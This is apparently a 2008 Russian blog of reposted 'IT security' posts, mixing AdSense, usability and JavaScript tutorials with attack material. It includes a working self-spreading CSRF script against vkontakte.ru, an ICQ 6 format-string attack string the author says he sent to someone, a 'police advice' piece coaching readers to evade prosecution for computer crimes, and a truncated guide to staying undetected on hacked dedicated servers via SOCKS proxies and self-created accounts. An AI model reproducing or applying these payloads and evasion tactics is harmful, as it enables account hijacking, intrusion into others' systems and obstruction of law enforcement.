Тогда, в коде страницы, перед саммым заголовком ставим начало описания: <google_ad_section_start>, а где заканчивается информативная часть статьи (у меня - перед информацией о возможной перепечатке), ставим конец описания: <google_ad_section_end>

Примерно так, если образно:

<google_ad_section_start>

Заголовок

Текст

<google_ad_section_end>

Подпись

Вот и всё! Теперь у тебя на странице только та реклама, которая интересна посетителю.

На сайте реклама даёт очень хороший отклик, а вот на форуме и новостях - не очень. На РНР-движках с динамичным содержанием, Гугл не может точно подобрать рекламу по теме. Но и на форуме и в новостях люди кликают по ссылкам.

Обязательно нужно ставить поиск от Гугла. Он хоть и приносит не такой большой доход, как баннеры, зато позволяет видеть, что искали на твоём сайте. В аккаунте заходим на закладки: Отчёты/Расширенные отчёты. В выпадающем списке выбираем, что нужна информация по поиску, а справа ставим точку перед указанием, что нужна информация о частых запросах. Жмём кнопку в центре страницы, появляется список самых частых запросов. По нему ты можешь видеть: что искали на сайте. Потом делай вывод: чего на сайте нет. И добавляй новую информацию. Этим привлечёшь постоянных посетителей и заработаешь ещё больше денег.

Ещё на странице с результатами поиска можно размещать свой логотип и, кажется, блок ссылок. Подробнее, всю информацию о программе - ищи на их сайте!

Пользуйся "фильтром конкурирующих объявлений". Смотри, какие сайты у тебя рекламируются и отсекай ненужные, занося их URL в список фильтра.

Например, мне не нужны сайты "Хостинг в Казахстане", "Недвижимость Азербайджана", "Такси Киева", "Продажа компьютеров в Латвии". Я их URL'ы занёс в фильтр. Таким образом освободилось место для более привлекательных для посетителей сайта объявлений.

Может цены на клики по тем объявлениям, которые я забанил и были выше, но по ним всё равно никто бы не кликнул...

Это не занчит, что вы должны банить все иностранные объявления. Просто думайте об интересах своих посетителей. "Такси Киева" моим посетителям точно не нужны, как и такси в Москве или СПб. А вот "Недвижимость Киева" или "Отдых в Крыму" очень даже интересны. Вот их оставляем. То есть, поставь себя на место своего посетителя и фильтруй всё лишнее.

Обязательно создай клиентские каналы. Это немного сложно и долго, но позволяет видеть рекламодателям, где на сайте будет их реклама. Тогда они могут поднять для тебя цену клика или начать платить не за клики, а за 1000 показов (как правило, это выгоднее).

Одно дело, если рекламодатель не знает, где будет его объявление, и совсем другое, когда он точно знает - оно будет вверху всех страниц раздела "Недвижимость" на баннере размером 728х90 пикселей. В первом случае он, например, назначит цену 3 цента за клик, а во втором - 30 центов. Поэтому, не ленись, создавай клиентские каналы!

Я создавал по 1-2 канала в сутки, зато теперь и рекламодателям хорошо, и я вижу: на каком баннере был клик. Могу примерно прикинуть, какой была цена клика. Иногда это сразу видно, а иногда можно только предполагать.

Если пока не разобрался с клиентсткими каналами, то создай URL-каналы. Это очень легко. Просто вводишь адреса своих сайтов, страниц и разделов и Гугл будет отслеживать клики по этим адресам. Рекламодателям от этого радости никакой, но тебе начальную статистику даст: какие страницы приносят больший доход.

На сегодня всё. В заключение немного о баннерах "рефералов". Я поставил только реферал AdSense ("Сайт приносит прибыль с помощью Гугла"), так как не представляю, как можно заинтересовать остальными продуктами моих посетителей. Ведь баннер не несёт никакой смысловой нагрузки. Если бы была целая страница с описание что да как, то кто-то и кликал бы, а так...

Вернёмся к тому, что я уже установил. Если кто-то зарегистрируется в Гугл ЭдСенс кликнув по твоему баннеру, то ты может что-то с него получишь, а может и нет. У Гугл здесь очень интересная программа. Если в течение 180 дней твой реферрал заработает $5, Гугл тут же заплатит тебе тоже $5. Если в течение этого срока он заработает $100 и получит право на вывод (то есть, Гугл не уличит его в накрутке кликов или ещё в чём противоправном), то ты получишь $250. Если ты наберёшь за 180 дней 25 реферралов и каждый из них сможет в течение 180 дней (после их регистрации) заработать по $100 и получить право на вывод, то тебе заплатят премию $2000.

В течение года можно получить только одну премию!

После этого ты с реферрала уже ничего получать не будешь...

В справочном центре Гугла набери в поиске: "Сколько я заработаю на рефералах?" и на открывшейся странице сможешь прочитать о премиях за реализацию других продуктов Гугла. Там премии скромнее: от менее чем $1 до $5.

Ещё немного о получении денег от Гугла. Сейчас нам платят только чеками. Но у них есть ещё электронный перевод платежей (EFT). Он заключается в том, что деньги переводят прямо на твой счёт в банке. Причём, платёж приходит сразу, а не в течение нескольких недель. И деньги переводят не в долларах США, а в национальной валюте. Это позволяет не терять деньги на комиссионных банка.

Всё хорошо, но только платят пока в ограниченное число стран:

Австралия - Австралийский доллар
Австрия - Евро
Бельгия - Евро
Канада - Канадский доллар
Чехия - Крона
Дания - Крона
Финляндия - Евро
Франция - Евро
Германия - Евро
Ирландия - Евро
Израиль - Шекель
Италия - Евро
Япония - Иена
Нидерланды - Евро
Новая Зеландия - Новозеландский доллар
Норвегия - Крона
Польша - Злотый
Португалия - Евро
Словакия - Крона
Испания - Евро
Швеция - Крона
Швейцария - Франк
Турция - Лира
США - Доллар США
Великобритания - Английский фунт стерлингов
На мой интерес, когда радость перевода EFT будет доступна для других стран, в том числе для России, мне ответили:

Мы понимаем Ваше желание использовать этот способ для своего аккаунта, поэтому усердно работаем над тем, чтобы предоставить Вам дополнительные возможности перевода платежей. Пока эта задача не решена, мы благодарим Вас за терпение.

Ну что ж... Ожидаем...

копипаст, источник: http://www.godspirit.ru/

пятница, марта 28, 2008

IT-Безопасность: Mac взломан на конкурсе хакеров за 2 минуты

Эти $10 тыс. Чарли Миллер заработал, наверное, за самое короткое время в своей жизни.

В четверг он получил первый из трех призовых ноутбуков — плюс чек на $10 тыс. — за взлом MacBook Air на конкурсе хакеров PWN 2 OWN, в рамках конференции по безопасности CanSecWest.

Организаторы конкурса предложили Sony Vaio, Fujitsu U810 и MacBook в качестве наград тем, кому удастся взломать каждую из этих машин и прочесть содержание системного файла с использованием не известной ранее "0day" атаки. В первый день конкурса, когда участникам было позволено атаковать компьютеры только через сеть, никому не удалось взломать ни одну из систем, однако в четверг правила были облегчены и позволили конкурсантам просить организаторов конкурса использовать компьютеры для таких операций, как посещение веб-сайтов и открытие сообщений e-mail.

Миллеру, который прославился тем, что в прошлом году одним из первых взломал Apple iPhone, много времени не потребовалось. Через две минуты он попросил организаторов конкурса посетить веб-сайт с его эксплойтом, в результате чего получил управление компьютером — к восторгу примерно 20 свидетелей и болельщиков. Ему сразу дали подписать соглашение о неразглашении информации, запрещающее рассказывать о деталях бага, пока спонсор конкурса, компания TippingPoint, не уведомит поставщика. По правилам конкурса, Миллер мог использовать только то программное обеспечение, которое было предустановлено на Мас, так что уязвимость должна быть доступна через браузер Apple Safari или содержаться в нем самом.

Прошлогодний победитель, Дино Даи Зови (Dino Dai Zovi), выиграл приз, воспользовавшись уязвимостью QuickTime. Он поздравил Миллера, но сам в конкурсе этого года не участвовал, объяснив это тем, что нужно оставить возможность выиграть кому-то другому.

понедельник, марта 24, 2008

IT-Безопасность: Собираем качественный прокси-лист

Очень часто я возмущаюсь при виде прокси-листов,которые выкладывают юзвери,особенно которые постят очередной говнолист,ради + в репу,но думаю есть люди,которые действительно хотят помочь,но не знают как,и их прокси лист называется "говно".В этой мини статье пойдет речь о том,как собрать качественный прокси лист ибо Quality better than quantity
Итак,поехали

1.Сбор прокси.(Leeching,Grabbing)


Тут всё элементарно,как обычно собираем прокси с форумов,сайтов,сканим и приводим их к виду 127.0.0.1:777(ип:порт)
(В этом вам может помочь мой парсер )

2.Чистка списка(Filtering).


Очень большая проблема для юзеров прокси-"грязный" лист(коими являются 80% выкладываемых выше),поэтому делаем следующее
а)Очистка дубликатов
Удаляем дубликаты,почти любой инструмент для работы с прокси это имеет
б)Фильтрация
Фильтруем прокси лист от
1)Planetlab(CoDeeN) прокси.Говорить нечего-мусор,котрый есть в каждом прокси листе.Прокси являются полу-бесплатными,постоянно вылезает "You are trying to use a node of the CoDeeN CDN Network. Your IP address is not recognized as a valid PlanetLab address,
so your access to CoDeeN does not include all HTTP types...".Также эти прокси не пропускают POST запросы,Connect на них тоже не работает
2)Government,Military,FBI прокси.Ну тут ноу комментс,таких прелестей не надо

Вопрос-а чем фильтровать-то?
Это умеет Charon,но если вы его не юзаете,то очень советую скрипт http://ipmaster.org/ip2cc.html (форма неправильно работает в Opera).Пихаем в форму прокси,отмечаем "Filter CoDeeN (Planetlab) IPs" и "Filter U.S. Government/Military IPs".На выходе получаем два списка-то что отфильтровали,и то что осталось,нас конечно интересует второй,далее работа с этим списком

3.Проверка(Checking).


Просто проверяете прокси вашим любимым чекером,единственное что порекомендую-ставьте таймаут 5-10 секунд(а можно и 2-3),и проверять быстрее и не ждать по пол минуты при сёрфинге.
Также на этом этапе отбрасываются нерабочие прокси,можно выбросить не анонимные,на ваше усмотрение.

4.Верификация(Verify).


Для особо продвинутых известно-прокси мало только прочекать,их нужно верифицировать.
Верификация-отправка запроса через прокси на сервер,получение ответа(заголовок и/или код страницы) и поиск в ответе ключевого слова(keyword).Если находим -прокси нормальный,если нет-выкидываем.
Для этих целей я использую ProxyHunter,очень удобно,особенно после скана
Но верефикация тоже не панацея-на некоторых прокси может быть,например,доступ только к гугл.ком,а к другим сайтам запрещен
И ещё-можно пропустить проверку прокси,сразу верефикация(но прокси хантер анонимность не определит )

Собственно вот и всё,у вас на руках хороший список прокси,95% прокси в нём работают
©v1ru$,www.proxy-socks.info

суббота, марта 22, 2008

IT-Безопасность: Милицейские советы

Предисловие: не все что белое – белое и не все что черное – черное... В силу некоторых обстоятельств я знаком с деятельностью правоохранительных органов Украины и поэтому решил поделиться частью свои знаний с вами. Хотя эти советы относятся к законодательству Украины, и я не знаком с законодательством других стран, но думаю, они будут полезны как для представителей России и других стран СССР.

Прошу заранее прощения за несистематичность материала, но я считаю, что систематичность будет скучной для вас. И к тому же ничего нового здесь не открыл.

Закон. Кратко
Закон надо знать! Советую всем прочитать хотя бы раздел о компьютерных преступлениях, ведь там маленькие статьи и их всего лишь 6 (361,361-1,361-2,362,363,363-1). Кроме того можно вычеркнуть из списка ст.362 и 363.
И так осталось 4 статьи:
1. ст. 361 – не санкционирование вмешательство в деятельность компьютеров, что привело к вытеку, повреждению, изменению информации.
2. ст. 361-1 – распространение вирусов и создания вирусов с целью распространения.
3. ст. 361-2 – распространение «секретной» информации
4. ст. 363-1 – массовая рассылка сообщений, которые нарушают роботу компьютеров.

Это было сказано очень кратко. А теперь не систематизированные тезисы.
1. Если пишете вирус, то никогда и никому не говорите что пишете для продажи. Просто вы пишете для своего развитие, для постижения всех глубин программирования.
2. За непосредсвенно спам не наказывают, ибо нету такой статьи.
3. Если вы продаете информацию никогда не говорите что она является закрытой. Если вам докажут что она является закрытой, то извинитесь и скажите что не знали (это связано с тем, что для криминального наказание нужна обязательна «вина»).
4. Никогда не говорите, что делали в группе. Будьте для органов одиночкой, так как группа – это отягощающее обстоятельство из-за которого наказание могут увеличить в два раза.
5. И вообще никогда не говорите без адвоката ничего, вообще ничего. Лучше быть немым, чем лишится воли.
6. Поиском «хакеров» в Украине почти-почти-почти не занимается служба безопасности. И еще больше почти не занимается милиция. В основном все происходит через службы банков, провайдеров и других приватных структур. Они собирают всю информацию про вас, а потом передают уже в правоохранительные органы.
7. Знайте что в суде почти нереально доказать компьютерное преступление при хорошем адвокате и при вашем молчании. Главное чтобы вы ни в чем не признались. Всегда и все отрицайте и повторяйте что вы белый и пушистый.
8. Яркий пример того как действует служба безопасности самого большого банка Украины. Они приходят к тебе и говорят, что ты крутой хакер, ты их взломал и хотят взять тебя на роботу, только чтобы ты сначала рассказал, как проник в их систему, а потом когда ты все расскажешь, то фактически можешь прощаться с волей.
9. Всю незаконную информацию всегда храни на зашифрованном разделе, пускай никогда она не будет в открытом виде. Лично я пользуюсь BestCrypt. Кстати она не всегда оперативно отключает зашифрованный раздел, поэтому я когда еще когда учился, то вывел кнопку Ресет поближе к клавиатуре и теперь буквально за секунду могу перезагрузить компьютер и тем самым оставить всю зашифрованную информацию зашифрованной даже если был примонтирован зашифрованный раздел. Очень полезно если вас будет захватывать спецгруппа.
10. Знай что даже если твой айпишинк где-то засветился, то это не ты, а БОТ который злой хакер установил на твой комп, чтобы подставить тебя.

Послесловие
Наверно хватит. Компьютерные преступления еще очень мало проработаны на практике, поэтому сложно советовать много и конкретно. Вся статья не претендует на 100% правдивость, так как она построена на личном опыта роботы в милиции по не компьютерным преступлениям и на учебном материале, что проходили в академии. Так что все советы, критика и дополнения приветствуются.

ПС: и немного отойду от темы. Сейчас очень распространенная статья хулиганство, за нее многих привлекают к уголовной ответственности, из-за незнания законодательства. А надо лишь помнить, что нельзя ничего делать просто так, ибо просто так означает против всего общества, то есть подпадает под статью хулиганства. Даже если вы незнакомому челу испортили лицо, то говорите, что он косо на вас посмотрел или вам показалось, что он вас обозвал или еще что-то в этом духе.

Копипаст отсюда

пятница, марта 21, 2008

IT-Безопасность: 25 способов улучшить свой сайт

Эта небольшая статья поможет новичкам (и не только) оценить удобство собственного сайта и укажет основные недочёты, присущие многим сайтам. Ваши пользователи скажут вам спасибо =)

Юзабилити/Доступность

  1. Используйте логотип: поставьте ссылку на главную страницу. Звучит просто, но это здорово экономит время ваших посетителей.
  2. Сделайте ссылки явными: проще простого изменить ссылки и сделать их заметными на фоне сайта.
  3. Делайте текст читаемым: не забивайте себе голову тем, как бы впихнуть весь текст в видимую часть странички, тем самым избавив посетителей от необходимости пользоваться прокруткой – позвольте тексту свободно дышать, увеличьте межстрочный интервал и добавьте пустое пространство. И не стесняйтесь увеличивать размер шрифта.
  4. Создайте понятную страницу ошибки 404: объясните, что означает эта ошибка, и дайте ссылку на карту сайта, главную страницу или поиск.
  5. Добавьте возможность связаться с вами: казалось бы, простая вещь, но если у посетителей нет возможности связаться с вами, они, вероятно, не смогут сообщить вам о проблемах на сайте.


СЕО

  1. Добавьте атрибут title: добавьте этот атрибут в ссылки основного меню. Эта небольшая операция увеличит CEO-привлекательность страницы.
  2. Создайте карту сайта для поисковых систем: существует множество генераторов карты сайта, которые создадут её за считанные минуты. Этим вы можете очень быстро увеличить видимость своего сайта для поисковых машин.
  3. Оптимизируйте мета-теги: проверьте, совпадают ли они с тематикой ваших страниц и исправьте их там, где требуется.
  4. Проверьте заголовки: удостоверьтесь, что заголовки внутри тегов H1, H2 и H3 правильно используются. Они должны содержать основные ключевые слова. К тому же наличие ключевых слов в заголовках помогает и посетителям ориентироваться на сайте.
  5. Ссылайтесь на внутренние страницы: об этом часто забывают, но стоит ставить ссылки с основных страниц на внутренние, которые расположены на нижних уровнях.


Дизайн/Веб-разработка

  1. Обратная связь: замечательно, если у каждого посетителя будет возможность предложить вам свои идеи по поводу улучшения ресурса. Проще простого закрывать глаза на ошибки на собственном сайте.
  2. Браузеры: проверьте функциональность вашего сайта во всех популярных браузерах. Обязательно исправьте все ошибки.
  3. Укажите направление: не стоит выкладывать на главной странице сайта сразу всю информацию. Дайте возможность посетителям самим побродить по сайту. Просто укажите им дорогу, разместив заметные «указатели»-меню.
  4. Не решайте за пользователя: избегайте всплывающих и изменяющих размер окон и других подобных вещей. Запомните – браузер принадлежит пользователю, а не вам.
  5. Анимация: я не противник использования анимации, но не позволяйте картинкам постоянно меняться, пока посетитель пытается прочитать содержание или разглядывает продукт. Это то же самое, что пытаться продать машину, назойливо танцуя вокруг покупателя в костюме огромного банана. Ну почти то же самое.


Содержание

  1. Рерайт: перечитайте основные тексты сайта. Если они вас самого не заинтересовали – перепишите их.
  2. Упрощайте: старайтесь не использовать слишком много специальных слов и выражений, заменяйте их по возможности на более простые и понятные.
  3. RSS: сделайте подписку на RSS максимально удобной и доступной.
  4. Не переусердствуйте: люди не будут круглый день торчать на вашем сайте. Старайтесь лаконично предоставлять посетителям основную информацию. Пустая болтовня – не для веб-сайтов.
  5. Доступность: представьте себя человеком, который впервые забрёл на ваш сайт, и проверьте, сможете ли вы с первого раза найти путь ко всем ключевым страницам. Возможно, в этом вам понадобятся помощники.


Вне сайта

  1. Видимость: проверьте, как высоко вы находитесь в поисковых машинах по названию вашей компании. Если невысоко, просто опубликуйте несколько ссылок с названием вашей компании в качестве ключевого слова.
  2. Будьте отзывчивы: отвечайте на вопросы и помогайте людям на форумах, тематика которых пересекается с вашей сферой деятельности. У вас появятся новые друзья и вы заработаете определённый вес в этих сообществах. Запомните, авторитет = трафик.
  3. Не стойте в стороне: если вы ещё не зарегистрировались в популярных социальных сетях, не тяните! Люди могут искать услуги, которые предоставляет ваш ресурс, через подобные сайты.
  4. Будьте в курсе: читайте новостные ленты, обращайте внимание на всё, что касается вашего круга деятельности – можете узнать много полезного.
  5. Всегда на шаг впереди: старайтесь постоянно следить за всем новым в веб-технологиях. Вероятно, вы сможете использовать их себе во благо и стать первым, заняв собственную нишу.


копипаст отсюда

вторник, марта 18, 2008

IT-Безопасность: Владельцы ботнетов Srizbi и Storm Worm развязали войну

Специалисты по безопасности обнаружили новые свидетельства войны, которую ведут между собой владельцы ботнетов Srizbi и Storm Worm. Словно мафиозные группировки из «Клана Сопрано», хакеры устроили передел сфер влияния. Отличие только в том, что преступники от виртуального мира борются за контроль над десятками тысяч зараженных компьютеров и применяют в этой войне не автоматы, а троянов.

Троян под названием Trojan.Srizbi, часть боевого комплекта MPack — последняя новинка хакерских вооружений. Он не только заражает компьютер и делает его частью ботнета, но и пытается уничтожить своего главного конкурента — другого трояна Storm Worm.

Это ещё один эпизод в войне двух ботнетов. Совсем недавно боты из сети Storm Worm «ддосили» рабочий сервер Srizbi, который использовался для распространения вредоносного ПО. Сервер был выведен из строя на целый день. Специалисты по безопасности наблюдали за этой атакой и говорят, что в течение суток не могли достучаться до него, чтобы скачать свежую версию трояна.

Вполне возможно, что в этой войне участвуют русские. По информации Symantec, продажей хакерского комплекта MPack занимается группа русских хакеров. MPack — это очень профессионально сделанный набор веб-компонентов на PHP, предназначенный для управления ботнетами. Среди других инструментов, в него входит информационная панель, которая показывает IP-адреса всех заражённых ПК и список уязвимостей каждого конкретного компьютера.

Соперником Srizbi является сеть Storm Worm, названная так по теме первого спама, который они рассылали. Это децентрализованная пиринговая сеть, которую практически невозможно уничтожить. Набор новых юзеров происходит в основном через электронные открытки, путём перебора нескольких вариантов эксплоита.

IT-Безопасность: Javascript: Анимация. (Урок)

Если ты идешь по пути веб-мастера, знаком с HTML и CSS, то этот небольшой урок как-раз для тебя.



Мы сегодня научимся делать красивую анимированную шапку для твоих веб-сайтов.
Примерно такую, как на сайте веб-студии Perevaga.com (Читается пэрэвага, в переводе с украинского -- преимущество, превосходство) [профиль компании]


Очень часто такие вещи делают на flash, но ты же сам прекрасно понимаешь что далеко не у всех установлен flash-плеер, а многие его выключают принудительно, дабы оградить свой мозг от навязчивой, лезущей во все дыры рекламы.


Конечно же если так размышлять то можно сказать и о том, что есть еще люди, которые отключают javascript и картинки, но пользователь без javascript ничего не потеряет, у него будет отображаться фоновая картинка, просто не анимированная.


Преимущество данного метода -- кросбраузерность, полный отказ от flash. Не все правда так просто, есть в этом методе свои грабли, с чем мы и будем бороться дальше в этом уроке.


Из недостатков -- несколько большая нагрузка на процессор, все-таки flash под это лучше заточен, в следствии чего на очень слабеньких машинах анимация может подтормаживать и дергаться.


Итак, хватит болтать! К делу!


Создаем пустой html документ, в моем примере он выглядит так:



<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1251" />
<title>Урок</title>
<style type="text/css">
</style>
</head>
<body>
</body>
</html>

Первым делом пропишем в секцию style цвет фона для документа. Ели вы хотите например белый фон, все равно задайте его, т. к. он не у всех белый по умолчанию, это зависит от системного цвета в настройках окошек. И сразу же зададим нулевые отступы



<style type="text/css">
body{background-color:#FFFFFF; padding:0; margin:0;}
</style>

Создадим элемент

<div id="head"></div>. Это будет шапка документа, туда же мы кинем и анимированный фон. id нужно задать, чтобы потом получить к этому элементу доступ из javascript.

Теперь нужно собственно найти какую-нибудь красивую бесшовную по вертикали текстуру, которую мы бросим на задний фон. Или к примеру сфотографировать красивое небо и закольцевать его вручную. Ты можешь узнать, как это сделать у google. Спроси про "создание бесшовных текстур".


Я вот себе сделал такую текстурку. Она кстати является объектом, защищенным авторским правом, так что если захочется где-то применить, спроси сначала у меня.


Допустим, небо у нас уже есть и оно лежит в img/sky.jpg. Определим теперь стиль для нашей шапки, чтобы там было небо: вставляем в секцию <style> следующий код:


#head {
background: url(img/sky.jpg) repeat-x;
width:100%;
height:429px;
}

Только не забудь вписать туда высоту своей картинки, у тебя вряд-ли будет 429px.

Теперь логотип/заголовок. Как ты можешь видеть, в моем примере он достаточно красивенький. Немалую роль в этом сыграл 8-битный канал прозрачности. Для этого нужно сохранять картинку в формат PNG-24. Конечно, ты можешь использовать и GIF или PNG-8 с присущей им 1-битной прозрачностью, но только в том случае, если фоновая картинка достаточно однородна, тогда тебе следует задать цвет matte (например в photoshop ты можешь найти этот пункт при сохранении изображения для веба) таким, в который окрашена наибольшая часть твоей фоновой картинки. Но вот если ты хочешь к примеру отражение под логотипом, как в моем примере (это же так модно в эпоху web2.0!), тогда твой выбор -- png-24. Правда он немного больше весит и для корректного его отображения в IE6 нам придется потом вставить один костыль, о котором пойдет речь ниже.


Итак, добавляем логотип внутрь шапки: <img id="logo" src="img/logo.png"/>, а в секцию <head> вставляем где нибуть такой код:



<!--[if lt IE 7]>
<![if gte IE 5.5]>
<script type="text/javascript">
function fixPNG(element)
{ var src;
if (element.tagName=='IMG')
{
src = element.src;
element.src = "blank.gif";
}
element.runtimeStyle.filter = "progid:DXImageTransform.Microsoft.AlphaImageLoader(src='" + src + "',sizingMethod='scale')";
}
</script>
<style type="text/css">
#logo{ filter:expression(fixPNG(this));}
</style>
<![endif]>
<![endif]-->


Еще нужно строго указать размер картинки, чтобы этот хак работал. Сделаем это к примеру через стили: #logo{width:596px; height:89px}
Да, не забудь бросить в папку с твоим документом прозрачную картинку blank.gif размером 1x1 пиксель. Можешь взять мою.

Это и есть костыль, о котором говорилось выше. Если кто-то юзает такой старый хлам, как IE младше версии 5.5, можем ему посочувствовать. Он не увидит нашу красоту. Если интересна данная тема, погугль по запросу "IE6 PNG прозрачность".


Теперь неплохо бы нормально расположить нашу картинку. Для этого отцентрируем содержание шапки (добавим правило text-align:center для элемента #head); и зададим верхний отступ для логотипа (margin-top:150 для #logo)


И наконец-то мы дошли собственно к анимации. Добавляем код в самый конец документа, перед закрывающим тегом </body> (можете использовать как альтернативу window.onload):



<script language="Javascript">//Да-да-да, сейчас мы будем что-то двигать
var sky_pos = 0;
var sky = document.getElementById('head'); //Незачем в каждой итерации цикла искать элемент документа с шапкой, запихнем в переменную.
setInterval(function(){sky.style.backgroundPosition = sky_pos+++'px 0px'},45);//Поехали!

</script>


Еще немного пояснений: setInterval(f,t) -- вызывает функцию, переданную первым параметром через каждые t миллисекунд. Со значением t можете поэкспериментировать, для более систем со слабеньким процессором лучше ставить немного меньшие значения, но слишком разгонять ваше небо тоже не стоит, это может показаться посетителям вашего сайта не таким клевым, каким это кажется вам. Можешь так же добавить сдвиг фона обратно, когда он достигнет значения, кратного его ширине, т. к. теоретически когда-то backgroundPosition станет ооочень большим :).

А теперь займемься немного оптимизацией: когда пользователь открывает другое окно или переключается на другую вкладку в браузере, мы можем отключить анимацию.
В идеале можно было бы совсем отключить вызов нашей функции каждые N милисекунд, но дабы не усложнять свою жизнь поступим просто, добавим флажок:


<script language="Javascript">//Да-да-да, сейчас мы будем что-то двигать
var sky_pos = 0;
var b=true;
var sky = document.getElementById('head');
setInterval(function(){b?sky.style.backgroundPosition = sky_pos+++'px 0px':void(0);},35);
</script>



А в теге body добавим обработчики событий: onBlur="b=false" onFocus="b=true"



И последний момент: Все как бы клево, но тебе может не понравится, как ведет себя курсор в IE6. Дело в том, что он, бедненький не может нормально кэшировать картинки, из-за этого курсор все время мерцает и рядом то появляются, то исчезают песочные часики. Но не расстраивайся! Нафига нам пользователи, которые юзают устаревший браузер? Шучу :) Мы остановим бешенство курсора. Для этого проапгрейдим наш жабаскрипт, находящийся в условных комментариях для определения старых версий ИЕ. Пишем это: document.execCommand("BackgroundImageCache",false,true); (Для непонятливых --нужно вставить эту строку перед function fixPNG).


Вуаля, готово!


Иатак, получившийся у нас код:



<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1251" />
<title>Урок</title>
<style type="text/css">
body{background-color:#FFFFFF; padding:0; margin:0;}
#head {
background: url(img/sky.jpg) repeat-x;
width:100%;
height:429px;
text-align:center;
}
#logo{width:596px; height:89px; margin-top:150px;}
</style>
<!--[if lt IE 7]>
<![if gte IE 5.5]>
<script type="text/javascript">
document.execCommand("BackgroundImageCache",false,true);
function fixPNG(element)
{ var src;
if (element.tagName=='IMG')
{
src = element.src;
element.src = "blank.gif";
}
element.runtimeStyle.filter = "progid:DXImageTransform.Microsoft.AlphaImageLoader(src='" + src + "',sizingMethod='scale')";
}
</script>
<style type="text/css">
#logo{ filter:expression(fixPNG(this));}
</style>
<![endif]>
<![endif]-->
</head>
<body onBlur="b=false" onFocus="b=true">
<div id="head">
<img id="logo" width="596" height="89" src="img/logo.png"/><br>
</div>
<div>А здесь будет содержание страницы</div>
<script language="Javascript">//Да-да-да, сейчас мы будем что-то двигать
var sky_pos = 0;
var b=true;
var sky = document.getElementById('head');
setInterval(function(){b?sky.style.backgroundPosition = sky_pos+++'px 0px':void(0);},35);
</script>
</body>
</html>

То что получилось у меня можно лицезреть здесь

Скопипастено отсюда

© Степаненко Виталий, 2008

понедельник, марта 17, 2008

IT-Безопасность: Критическая уязвимость в ICQ 6

Программа: ICQ 6 build 6043, возможно более ранние версии

Опасность: Критическая

Наличие эксплоита: Да

Описание:
Уязвимость позволяет удаленному пользователю скомпрометировать целевую систему.

Уязвимость существует из-за ошибки форматной строки при генерации HTML кода для отображения сообщения в встроенном компоненте Internet Explorer. Удаленный пользователь может отправить специально сформированное сообщение и выполнить произвольный код на целевой системе. Пример:

Отправьте сообщение, содержащее строку "%020000000s".

URL производителя: www.icq.com/download/icq6/

Решение: Способов устранения уязвимости не существует в настоящее время.

Сам побаловался - действительно работает. Человек хотя в оффлайн не улетает сразу, но на его стороне начинаются тормоза. После того как несколько раз ему будет послано это сообщение - ася при последующих запусках начинает сильно тормозить

IT-Безопасность: CSRF на vkontakte.ru

Обнаружил забавную атаку на сайт vkontakte.ru.
При переходе на сайт tvoydohod.com, если вы в этот же момент авторизованы на вконтакте, отработает следующий джаваскрипт:

<script>
function doit() {
var html;
html = '<img src=http://vkontakte.ru/profileEdit.php?page=contacts&subm=1&website=http://tvoydohod.com>';
window.frames["frm"].document.body.innerHTML = html;
}
</script>
<iframe name="frm" onload="doit()" width="0" height="0"></iframe>

Как видно, будет запрошена картинка с адресом vkontakte.ru/profileEdit.php?page=contacts&subm=1&website=http://tvoydohod.com, броузер сделает запрос по этому УРЛу, и на анкете в vkontakte ваше поле "Веб-сайт" станет равным tvoydohod.com.

Затем в вашем профайле, ваш друг, который вам доверяет кликнет на этот линк, и изменит профайл себе... И т д.



Этот вид атак называется Cross Site Request Forgery. В вики описаны все противоядия и куча полезной инфы.

Сам по себе CSRF довольно скучен. Но в данном случае забавно то, что каждый заразившийся становится разносчиком CSRF-линка.
Отписал в тех-поддержку, где столкнулся с "Это не баг!", "Не кликайте по подозрительным ссылкам!" и прочим. Надеюсь пользователей они ценят и поправят.
А вам было интересно узнать о таком простом "вирусе", который живет целиком в соц-сети =)

Автор: kenshin
Взято отсюда

IT-Безопасность: FAQ по выделенным серверам (Dedicated Servers)

1) Очень часто на форумах задают довольно тривиальный вопрос: "Что такое дедик и для чего он вообще нужен?". Во-первых, слово "дедик", очевидно, пошло от английского слова "dedicated" - то есть выделенный, в данном случае "dedicated server" - выделенный сервер. Те, кто имеют уже опыт работы в Интернете, довольно хорошо знают, для чего они нужны, а также какие цели можно преследовать, используя их (сервера), но есть и новички, для которых это есть в некотором понимании неизвестность. Дедики, как их принято называть, на которых имеются довольно мощные сетевые интерфейсы, каналы и довольно не слабая аппаратная конфигурация служат для обработки данных, а также для хранения баз данных или любого другого материала находящегося на них для обслуживания персонала, фирмы или организации.

2) Управление сервером осуществляется в основном через Remote Desktop (Удалённый рабочий стол), вызвать который можно командой "mstsc" в меню Пуск -> Выполнить.

Возможности, как уже наверно стало понятно, у серверов, особенно таких, которые обслуживают сразу несколько сотен, а, иногда, и несколько тысяч компьютеров, довольно таки большие и мощная конфигурация, но никогда не надо забывать, что рано или поздно они тоже имеют свойство иссякать. Как правило, находясь в сети, сервер постоянно пропускает через себя огромные потоки информации, которая ему приходит от нескольких компьютеров и роутеров. Их запросы он должен своевременно обработать и выполнить, от этого зависит продуктивность работы в целом и, как следствие, достижение определённых результатов в её производительности. В большинстве случаев, когда сервера используются в организациях, фирмах в сетевом пространстве интернета, они являются как бы внешним окном в сеть, и, как следствие, они, конечно же, должны обладать стабильностью в работе и грамотной защитой в архитектуре системы, её программ и баз данных. Теперь, когда я немного ознакомил тех, кто не совсем чётко себе представлял для чего они нужны и какая задача на них возлагается в первую очередь, постараюсь рассказать о тех тонкостях работы по использованию их ресурсов в осуществлении задач, которые мною были упомянуты ранее, а именно: как работать на взломанном сервере и не выделяться своим присутствием, дабы нам не заблокировали доступ к нему администраторы этих серверов и, что ещё хуже, не приняли более строгих мер по выяснению обстоятельств проникновения в его работу и следов обнаружения несанкционированного доступа, что само по себе уже уголовно наказуемо. Итак, если вы используете сервер вам не принадлежащий, и цель ваша как можно дольше остаться на нём незамеченным, прежде всего, было бы не плохо обзавестись такими программами как SocksCap и свежими прокси типа SOCKS, работающих на порту 1080 и сохраняющих вашу конфиденциальность в работе с сервером, если он был добыт нелегальным путём, и есть риск оставить на нём следы своего присутствия, то есть скрыть свой истинный IP адрес при подключении к подобным серверам. Далее, необходимо немножко представлять параметры конфигурации на сервере, для начала хотя бы такие как: создание учётных записей пользователей, раздачи прав и привилегий, а так же необходимо прописаться в группы пользователей, дабы получить необходимый нам доступ, создавая свою учётную запись, а не использовать существующие админские. Сделать это рекомендуется чем быстрее тем лучше, так как 